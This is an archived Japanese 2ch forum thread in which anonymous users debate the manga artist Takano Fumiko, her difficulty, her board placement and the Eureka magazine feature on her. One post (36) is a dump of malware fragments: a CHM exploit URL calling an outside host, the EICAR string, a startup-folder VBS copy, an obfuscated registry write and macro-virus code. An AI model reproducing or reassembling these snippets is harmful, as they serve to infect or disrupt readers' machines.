5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■高野文子■その思想と哲学

1 :花と名無しさん:2006/12/04(月) 04:43:21 ID:GmIeKySP0
なぜかカルト的(?)人気のあるこの人。
数冊読んでみたが本当におもしろいの?

いや、面白いのかもしれない…しかし…( ̄^ ̄;)
その真偽について魅力について語ってくださいよぉ〜

高野文子の著書

■絶対安全剃刀
■ラッキー嬢ちゃんのあたらしい仕事
■るきさん
■おともだち
■棒がいっぽん
■黄色い本

2 :花と名無しさん:2006/12/04(月) 05:05:50 ID:???0
>>1
素朴な疑問だが、この漫画家は少女漫画家でしょうか?
漫画板にも専スレあるんだけど。女性漫画家=少女漫画家じゃないよ。
少女漫画誌で連載経験ある人?
それと現役で、少女漫画誌で活動してる人?

ここ3年ぐらい少女漫画誌・レディコミ系で作品発表ないなら、
懐かし漫画板→http://comic6.2ch.net/rcomic/ (少女漫画板は現役が原則だから)

青年漫画誌が断然多いようなら、漫画板に移動ヨロ。
→高野文子
http://comic6.2ch.net/test/read.cgi/comic/1144828567/

3 :花と名無しさん:2006/12/04(月) 05:09:48 ID:???0
■絶対安全剃刀
ttp://ja.wikipedia.org/wiki/%E7%B5%B6%E5%AF%BE%E5%AE%89%E5%85%A8%E5%89%83%E5%88%80

■るきさん
ttp://ja.wikipedia.org/wiki/%E3%82%8B%E3%81%8D%E3%81%95%E3%82%93

■黄色い本
ttp://ja.wikipedia.org/wiki/%E9%BB%84%E8%89%B2%E3%81%84%E6%9C%AC

4 :花と名無しさん:2006/12/04(月) 06:15:06 ID:???0
>>2
少女漫画板に高野スレがなければ該当板に新スレが立ってなんの不自然でもありません。
彼女の作品が少女漫画か青年漫画か否かは個人の見解に拠るでしょう。
彼女は寡作な漫画家です。連載形式で新作の発表はしなくても
漫画は恒常的に売れてるようなので今でも新たなファンを獲得しています。
普段は少女漫画板にしかこない人、見ない人もいます。
重複スレがあるわけでもなくスレ違いでもありません。
この板の見学者・住人が高野文子に興味がなければ淘汰されスレ落ちするでしょう。
そんな鬼の首取ったみたいに排斥する必要性はありますか?

5 :花と名無しさん:2006/12/04(月) 06:29:36 ID:???0
>>4
少女漫画で代表作を産んだ「佐々木倫子スレ」が
現在、少女漫画板にスレがない事を考えたら、板違いかと…
漫画板に専用スレッドがあるのなら、移動が妥当じゃないか?

6 :花と名無しさん:2006/12/04(月) 07:09:23 ID:???0
>>2->>5
少女漫画家が世に何人いるのか知りません。
たとえばここに500人の少女漫画家の名前を羅列し
誰が相応しくないか篩い分けるお宅の検定により
認定されてたものがこの板にスレ立てを許可されるのでしょうか?
他板にあり少女漫画版で同スレが立ってることもありますが?

7 :花と名無しさん:2006/12/04(月) 08:06:52 ID:???0
なんだかしちめんどくさいスレだなあ

8 :花と名無しさん:2006/12/04(月) 08:35:02 ID:???0
別にいいじゃないの?どこでも食ってかかりたがる人間っているしね。

9 :花と名無しさん:2006/12/04(月) 08:41:32 ID:???0
スレ立てした>>1が、高野作品の面白さを懐疑的にレスしてるところが1番ワロタw

10 :花と名無しさん:2006/12/04(月) 08:58:43 ID:gAM4OpvI0
絶対安全剃刀しか読んだことないけど、たしかにこの人の作品は分かりにくい。

11 :花と名無しさん:2006/12/04(月) 09:01:33 ID:gAM4OpvI0
>>9 バカだなぁw

12 :花と名無しさん:2006/12/04(月) 09:30:34 ID:???0
ユリイカの高野特集見たいんだけど…

13 :花と名無しさん:2006/12/04(月) 09:33:13 ID:???0
>>12
買えば?7&Yでフツーに売ってる。

14 :花と名無しさん:2006/12/04(月) 11:22:20 ID:???0
>>12
その雑誌で初めて作者の顔見た

15 :花と名無しさん:2006/12/04(月) 11:23:36 ID:???0
なにこのアンチスレ

16 :花と名無しさん:2006/12/04(月) 11:34:59 ID:???0
スレ立てて速攻アンチに荒らされて気の毒だなw

17 :花と名無しさん:2006/12/04(月) 11:36:17 ID:???0
いつもの自治厨だろw

18 :花と名無しさん:2006/12/04(月) 11:41:56 ID:???0
ユリイカに特集組まれるくらいだから、
それだけで高野作品の文学性を証明している。

19 :花と名無しさん:2006/12/04(月) 13:46:35 ID:zLGXAPYr0
YAY!高野さんの作品好きです!

20 :花と名無しさん:2006/12/04(月) 17:17:56 ID:???0
高野文子の漫画にあんまり思想とか哲学とか
感じたことは無いが
あえていうなら

独特のカメラワークと日常の思考のゆらぎ・不安定感を
表現しようとしてる、という感じか?

21 :花と名無しさん:2006/12/05(火) 00:18:58 ID:???O
>>15-16は、なぜアンチだと思ったんだろう?

22 :花と名無しさん:2006/12/05(火) 02:33:57 ID:???0
独特な雰囲気があるよね

23 :花と名無しさん:2006/12/05(火) 02:46:22 ID:???0
絶対安全剃刀の
「たあたあたあと遠くて銃の鳴く声がする」
この最初の作品からもうわからん
どう解釈すればいいんだ?

24 :花と名無しさん:2006/12/05(火) 07:30:46 ID:???0
>>23
分からない人には分からないのです。

25 :花と名無しさん:2006/12/05(火) 12:27:38 ID:???0
分かってないのに分かってるフリする人もいる

26 :花と名無しさん:2006/12/05(火) 12:43:15 ID:???0
高野文子は文学だ。もちろんマンガだがからエンタメだけど
やってることは文学だな。

27 :花と名無しさん:2006/12/05(火) 13:05:46 ID:???0
唐突に終わるよな、あれ?終わり?って感じで。

28 :花と名無しさん:2006/12/05(火) 13:32:11 ID:0fBJF7Xh0
どんな話だったのか思い出しにくい。それが高野作品の特徴

29 :花と名無しさん:2006/12/05(火) 17:21:03 ID:???0
日常のとっちらかった思考経路をそのまま文・映像化
そんな感じ

30 :花と名無しさん:2006/12/05(火) 17:48:43 ID:???0
基本的に短編だからね

31 :花と名無しさん:2006/12/05(火) 19:56:04 ID:???0
最近書いてらっしゃるの?
黄色の本もるきさんも好きだよ。

32 :花と名無しさん:2006/12/06(水) 00:19:41 ID:???0
「春ノ波止場デウマレタ鳥ハ」が一番好きかなぁ。

33 :花と名無しさん:2006/12/06(水) 00:27:04 ID:5kjBavC60
最近作は
アエラムックの折鶴を折るやつか
リュウのペーパークラフトもの(連載といいつつ今号休載)

34 :花と名無しさん:2006/12/06(水) 00:27:28 ID:???0
黄色い本、ものすげー面白かった。

35 :花と名無しさん:2006/12/06(水) 00:36:04 ID:???0
難解でもなんでもないのに、やたら大上段に語られてるのがちょい不思議。
少女漫画的なリズムに慣れてないと、読みづらいのかもしらんが。

36 :<body onload=window()>:2006/12/06(水) 00:39:23 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

37 :花と名無しさん:2006/12/06(水) 01:02:57 ID:???O
田辺の鶴を読むと悲しく不安になる…

38 :花と名無しさん :2006/12/06(水) 09:26:23 ID:???0
古本屋で「チボー家の人々」が箱入りセットで売っていたので買ってしまった。
でもまだ数ページしか読めてない。

39 :花と名無しさん:2006/12/06(水) 09:38:28 ID:???0
それ長すぎてさすがに読む気しないw

40 :花と名無しさん:2006/12/06(水) 12:00:52 ID:???0
バスの座席に座ってる人の洋服の柄を見つめていたら
どんどん拡大していって子豚かなんかがブロックを積み上げてる
妄想に変わっていく、ってあたりの描写がすげえと思った。
一人でぼんやりしてるとこういう妄想誰でもすると思うけど
こんなのマンガでやっちゃうとこがすごい。

41 :花と名無しさん:2006/12/06(水) 12:33:13 ID:Rd7HqPx/0
高野文子の漫画は詩に似てると思う。
直接的じゃないというか、言葉の先に何かあるというか…。

42 :花と名無しさん:2006/12/07(木) 00:41:44 ID:???0
思うに、高野さんの作品は「母」が重要なテーマになってるんじゃないでしょうか

43 :花と名無しさん:2006/12/07(木) 00:47:17 ID:???0
スレタイが最悪すぎるw

44 :花と名無しさん:2006/12/07(木) 00:56:17 ID:???0
>>43
実際作品が難解でわかりにくいからじゃないの?

45 :花と名無しさん:2006/12/07(木) 00:57:02 ID:???0
難解でわかりにくいと「思想と哲学」なのか、勉強になったよwwwww

46 :花と名無しさん:2006/12/07(木) 01:00:10 ID:???0
思想と哲学は体系化するもんだろ。


47 :花と名無しさん:2006/12/07(木) 01:15:02 ID:LQDPPH/Z0
難解でも分かりにくくもないと思うけど・・
読みづらいヒトには読みづらいかも、ぐらいじゃない?

48 :花と名無しさん:2006/12/07(木) 01:23:00 ID:???0
スレタイがどうであれ高野文子を語るのはちょっと難しいよ。
主人公が何を思ってるかとか、何を表現しようとしてるのかとか…
普通の恋愛漫画じゃないし。

49 :花と名無しさん:2006/12/07(木) 01:35:29 ID:???0
誰か絶対安全剃刀のカラー頁の漫画が何を言いたいのか語ってほしい。
まったく意味不明だ!

50 :花と名無しさん:2006/12/07(木) 12:12:24 ID:???0
>>35
>難解でもなんでもないのに、やたら大上段に語られてるのがちょい不思議。

俺も同感
あと岡崎京子なんかも
どっちも好きだけど文学を超えた!とか言われるの見ると?と思う

51 :花と名無しさん:2006/12/07(木) 12:40:02 ID:Ev+gxNW+0
>>50
では、>>49の質問に答えてあげてください。

52 :花と名無しさん:2006/12/07(木) 13:45:55 ID:P+Yjv+US0
文芸雑誌ユリイカに特集されてるけど、
文学的見地で批評できるだけの価値があるって事じゃないの?
誰にでもわかる単純明快は作品は批評雑誌であるユリイカに載らない。
もちろん難しければ価値があるのかってのとは別だけど。

53 :花と名無しさん:2006/12/07(木) 14:36:12 ID:???0
ユリイカなんて今じゃ単なるサブカル零細雑誌だけどな…

54 :花と名無しさん:2006/12/07(木) 14:47:33 ID:???0
ユリイカは、文学関係なく「語りがいがあるかどうか」のような気がするけど。
他にも美術家や映画監督など他ジャンルの人の特集沢山あったけど、
特に文学との絡みで語られているとは限りません。
ユリイカ周辺の人や購買層の人たちが関心持ってそうな人がピックアップされてるだけだと思う。

しかし個人的に権威主義的に語る人もそれ聞いて悩む人もよくわかんねー。
>>1は自分で考えて自分で勝手に決めろ!と思うんだけど。

55 :花と名無しさん:2006/12/07(木) 17:14:59 ID:???0
>>54
文学って芸術なんですけどね。

56 :花と名無しさん:2006/12/07(木) 18:54:22 ID:???0
ユリイカとか読んでるやつは見下せる

57 :花と名無しさん:2006/12/08(金) 00:25:56 ID:zFxSG1t60
ハッハ、若いときにちょこっと読んだりしてみたなあ、ユリイカ。
中2病だったころだ・・。

>>54
大島弓子とかもそんな感じ。

58 :花と名無しさん:2006/12/08(金) 03:20:22 ID:???0
>>56 ありえねーw

59 :花と名無しさん:2006/12/08(金) 03:33:07 ID:???0
少なくとも高野は文学少女だったと思う。
でないとチボー家の人々なんか読まないでそ?

60 :花と名無しさん:2006/12/08(金) 17:51:49 ID:???0
>>58
え?ユリイカ読んでる自分かっこいいって酔っちゃううんちタイプ?w

61 :花と名無しさん:2006/12/08(金) 21:47:02 ID:???0
ユリイカはクイックジャパン並に恥ずかしいですよ…

62 :花と名無しさん:2006/12/09(土) 02:28:18 ID:???O
↑こんな事を書いちゃってる人達が恥ずかしくて始末におえない・・・

63 :花と名無しさん:2006/12/09(土) 04:49:47 ID:???0
>>60
カッコイイって思ってるんだ…。
まぁそうだろうね。知識乏しそうだしあなた。

64 :名無しんぼ@お腹いっぱい:2006/12/09(土) 09:03:24 ID:???0
夢もチボーも無い。

65 :花と名無しさん:2006/12/09(土) 15:38:10 ID:???0
サブカル馬鹿のセンズリ道具の一つに過ぎない>高野

66 :花と名無しさん:2006/12/09(土) 17:17:42 ID:???0
>>1


67 :花と名無しさん:2006/12/09(土) 17:43:46 ID:???0
>>63
あれ、国語苦手かな?

68 :花と名無しさん:2006/12/10(日) 05:05:29 ID:???0
高野文子って男に人気あるのかな?
しかも>>60のような頭の程度がわかるレスが…

69 :花と名無しさん :2006/12/10(日) 08:39:20 ID:???0
「おりがみ」が分からない・・・・・・。

70 :花と名無しさん:2006/12/13(水) 12:06:18 ID:???0
>>68
自分のメ欄がいつも一緒だって気付いてるか?程度低いぞw

71 :花と名無しさん:2006/12/13(水) 23:11:01 ID:CJTDa5wz0
分からないという感覚が分かんないんだよな。

分かった!分からない!と思って読むんじゃなくて、
「面白いなあ」とか「面白くないなあ」と思って読んで、
読み終わったら、そんじゃあ自分はなぜ面白いと思ったのか、面白くないと思ったのかを
考えるっていうんなら分かるけど。


72 :花と名無しさん:2006/12/13(水) 23:31:27 ID:???0
この人は本当に特別な位置にあるよね。
かつてALLANとか、プチ・フラワーで
作品を発表していて、デビュー前、普通に
ギムナジウムものとか書いていたところからも
「少女漫画家」といえるだろうし、その後
活躍の場をいろんなところに広げているけど、
どんなものを描いていても
「少女漫画」的なものを感じる…
永遠の少女性を感じさせるんだよ。
あっちのスレではマンセー一色なんで、
こっちではなんでもありでいいんじゃないかな。

73 :花と名無しさん:2006/12/13(水) 23:51:49 ID:???0
過大評価の人

74 :花と名無しさん:2006/12/14(木) 05:54:35 ID:???0
「奥村さんのお茄子」すっごく面白かったなー、視覚的にも感覚的にも


75 :花と名無しさん:2006/12/15(金) 02:33:54 ID:???O
るきさんの生活にあこがれたなあ。
あんな在宅で半分隠居生活みたいな、でもえっちゃんというつかず離れずの友はいるという。

76 :花と名無しさん:2006/12/15(金) 02:46:46 ID:???0
>>75
あ、それ自分も思った。
たしか「るきさん」てHANAKOの創刊位からの
連載だから、結構バブル期頃の作品なのに
すごい生活がシンプルで、別に無理もしてなくって
自然体なのが良かった。

77 :花と名無しさん:2006/12/15(金) 21:17:10 ID:???0
粋の思想なんて所詮、無能なだけ

78 :花と名無しさん:2007/01/08(月) 04:20:36 ID:9ZQvvFYz0


79 :花と名無しさん:2007/01/08(月) 17:52:24 ID:mNnT8Yj50
>>75>>76 自分も学生の頃るきさん的生活に憧れた。
でも今になると解ったが、月末月初の保険請求、そのお給料ではなんぼ質素な
暮らしでも、絶対暮らしていけない・・。多分小田急線沿線と思うけど、東京
一人暮らしなんて絶対無理。ましてナポリなんて・・。
そこで考えた仮説。
 1.るきさんは横町医院以外に数件掛け持ちしている。よって月末月初は不眠不休。
 2.あのアパートはるきさんの持ち物。毎月家賃収入がある。(あーでも大家さんの
   話もあったな・・)
 3.るきさんは大金持ちの娘で、毎月潤沢な仕送りがある。ナポリでもパパンの別荘暮らし。

高野氏は元看護婦だそうですが、本当に請求の仕事の相場知ってたのかな。
まぁ、それだからるきさんは「おとぎ話」的で、そこらへんに惹かれるんだけど。


80 :花と名無しさん:2007/01/08(月) 20:48:25 ID:???O
田辺のつるを読むと、不安感・焦燥感にかられ気分が沈む…
つるさん近い将来…

81 :花と名無しさん:2007/01/10(水) 19:39:02 ID:DfQuZDY70
日本はすでに老人社会に突入しています・・・

82 :花と名無しさん:2007/01/11(木) 14:50:53 ID:???0
変形八の字
ベロだし赤面!!

83 :花と名無しさん:2007/01/12(金) 18:02:07 ID:???0
なぜ岡崎と高野を比べる人がいるの?全然ちがうやん

84 :花と名無しさん:2007/01/13(土) 15:49:34 ID:???0
まずは読解力つけようね

85 :花と名無しさん:2007/01/13(土) 17:38:07 ID:gBjuD32I0
>>84
岡崎作品と高野作品のモチーフについて説明してください。

18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)